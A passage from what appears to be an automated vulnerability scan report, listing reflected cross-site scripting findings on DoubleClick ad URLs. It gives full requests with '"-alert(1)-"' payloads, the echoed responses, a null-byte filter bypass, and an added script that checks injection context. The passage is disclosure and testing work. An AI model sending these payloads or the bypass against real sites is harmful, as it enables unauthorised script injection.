The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e14e"-alert(1)-"ff222b8ffeb was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5452

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
7/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11
...[SNIP]...

3.83. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e8"-alert(1)-"168af111c1f was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5452

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.
...[SNIP]...

3.84. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0042f87"-alert(1)-"8498af5b338 was submitted in the pt parameter. This input was echoed as 42f87"-alert(1)-"8498af5b338 in the application's response. As in the other null-byte findings, the captured response below still contains the encoded %00 prefix in the click URL; the null byte defeated only the filter, and the unencoded quotation marks are what break out of the string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5576
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:04:37 GMT
Expires: Wed, 27 Apr 2011 22:04:37 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3Dv8/3af6/17/126/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_
...[SNIP]...

3.85. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0061853"-alert(1)-"3d4531fc5aa was submitted in the rqid parameter. This input was echoed as 61853"-alert(1)-"3d4531fc5aa in the application's response. Here the probe was appended to the existing request ID value rather than replacing it, and the captured response below still shows the encoded %00 between the original value and the quotation mark that terminates the string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5588
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:06:51 GMT
Expires: Wed, 27 Apr 2011 22:06:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA")
...[SNIP]...

3.86. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0030da6"-alert(1)-"9f29d88889c was submitted in the sg parameter. This input was echoed as 30da6"-alert(1)-"9f29d88889c in the application's response. The probe was appended to the original value 506741, and the captured response below shows the encoded %00 preserved in the click URL; it got the payload past the filter, and the unencoded quotation marks do the rest.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5588
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:00:34 GMT
Expires: Wed, 27 Apr 2011 22:00:34 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
ape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/12a/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.2
...[SNIP]...

3.87. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 592c7"-alert(1)-"714a4705579 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
53A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...
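The claim that the value is "copied into a JavaScript string which is encapsulated in double quotation marks" can be checked against the raw response rather than taken on trust, and the response for this finding is the one on this page that shows enough of the script (the closing `");` and the `var wmode = "opaque";` that follows) to see the context. The following script is an added example, not part of the scan report: it walks the JavaScript in each script block up to the reflected marker, tracking string and comment state, reports which character (if any) is needed to break out, and confirms that the quotation mark in a Burp-style probe really terminated the literal. The response body is constructed to resemble finding 3.87; the variable name `clickUrl` is an assumption, and regular-expression literals are not tracked.

```javascript
// Added example, not part of the scan report: confirm from a captured response
// which JavaScript context a reflected marker lands in, and which character
// is needed to break out of it.

// Constructed response fragment modelled on finding 3.87; the real body is
// longer and the variable name `clickUrl` is an assumption.
function buildResponse(reflectedT) {
  return [
    '<html><head><title>Click here to find out more!</title></head><body>',
    '<script>',
    'var clickUrl = escape("http://adlog.com.com/adlog/e/r=13185&sg=506741&t=2011.04.27.21.56.00' +
      reflectedT + '&event=58/http://www.newegg.com?nm_mc=ExtBanner");',
    'var wmode = "opaque";',
    'var bg = "same as SWF";',
    'var dcallowscriptaccess = "never";',
    '</script></body></html>',
  ].join('\n');
}
const SAMPLE_RESPONSE = buildResponse('592c7"-alert(1)-"714a4705579');      // as captured
const ESCAPED_RESPONSE = buildResponse('592c7\\"-alert(1)-\\"714a4705579'); // quotes escaped

const CLOSER = { double: '"', single: "'", template: '`' };

// Walk JavaScript source up to `index`, tracking string and comment state.
// Regular-expression literals are not tracked. Returns 'double', 'single',
// 'template', 'line-comment', 'block-comment' or 'code'.
function jsContextAt(src, index) {
  let state = 'code';
  for (let i = 0; i < index; i++) {
    const ch = src[i], next = src[i + 1];
    if (state === 'code') {
      if (ch === '"') state = 'double';
      else if (ch === "'") state = 'single';
      else if (ch === '`') state = 'template';
      else if (ch === '/' && next === '/') { state = 'line-comment'; i++; }
      else if (ch === '/' && next === '*') { state = 'block-comment'; i++; }
    } else if (state === 'line-comment') {
      if (ch === '\n') state = 'code';
    } else if (state === 'block-comment') {
      if (ch === '*' && next === '/') { state = 'code'; i++; }
    } else {                       // inside a string literal
      if (ch === '\\') i++;        // skip the escaped character
      else if (ch === CLOSER[state]) state = 'code';
    }
  }
  return state;
}

// Every occurrence of `marker` inside a script block, with its context and
// the character that would terminate that context (null when already in code).
function classifyReflection(body, marker) {
  const hits = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(body)) !== null) {
    const script = m[1];
    for (let at = script.indexOf(marker); at !== -1; at = script.indexOf(marker, at + marker.length)) {
      const context = jsContextAt(script, at);
      hits.push({ context, breakout: CLOSER[context] || null });
    }
  }
  return hits;
}

// Burp's probe is prefix"-alert(1)-"suffix. It worked if the prefix sits in a
// double-quoted literal and the alert(1) after the first quote is in code
// context, i.e. the quote really terminated the literal.
function probeBreaksOut(body, prefix) {
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(body)) !== null) {
    const script = m[1];
    const at = script.indexOf(prefix);
    if (at === -1) continue;
    const callAt = script.indexOf('alert(1)', at);
    if (callAt === -1) continue;
    return jsContextAt(script, at) === 'double' && jsContextAt(script, callAt) === 'code';
  }
  return false;
}

console.log(classifyReflection(SAMPLE_RESPONSE, '592c7'), probeBreaksOut(SAMPLE_RESPONSE, '592c7'));
```

Searching for the random prefix (592c7 here) rather than the whole payload is deliberate: the prefix is what Burp uses to locate the reflection, and it is present whether or not the server altered the quotation marks. Running the same check against the escaped variant shows the difference a fix makes: the marker is still inside the double-quoted literal, but the backslash-escaped quote no longer terminates it, so the probe no longer reaches code context.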

3.88. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22207"-alert(1)-"42033c76780 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039
...[SNIP]...

3.89. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b43"-alert(1)-"5c6dd508a9d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&
...[SNIP]...

3.90. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dfb5"-alert(1)-"406b18d8a5c was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

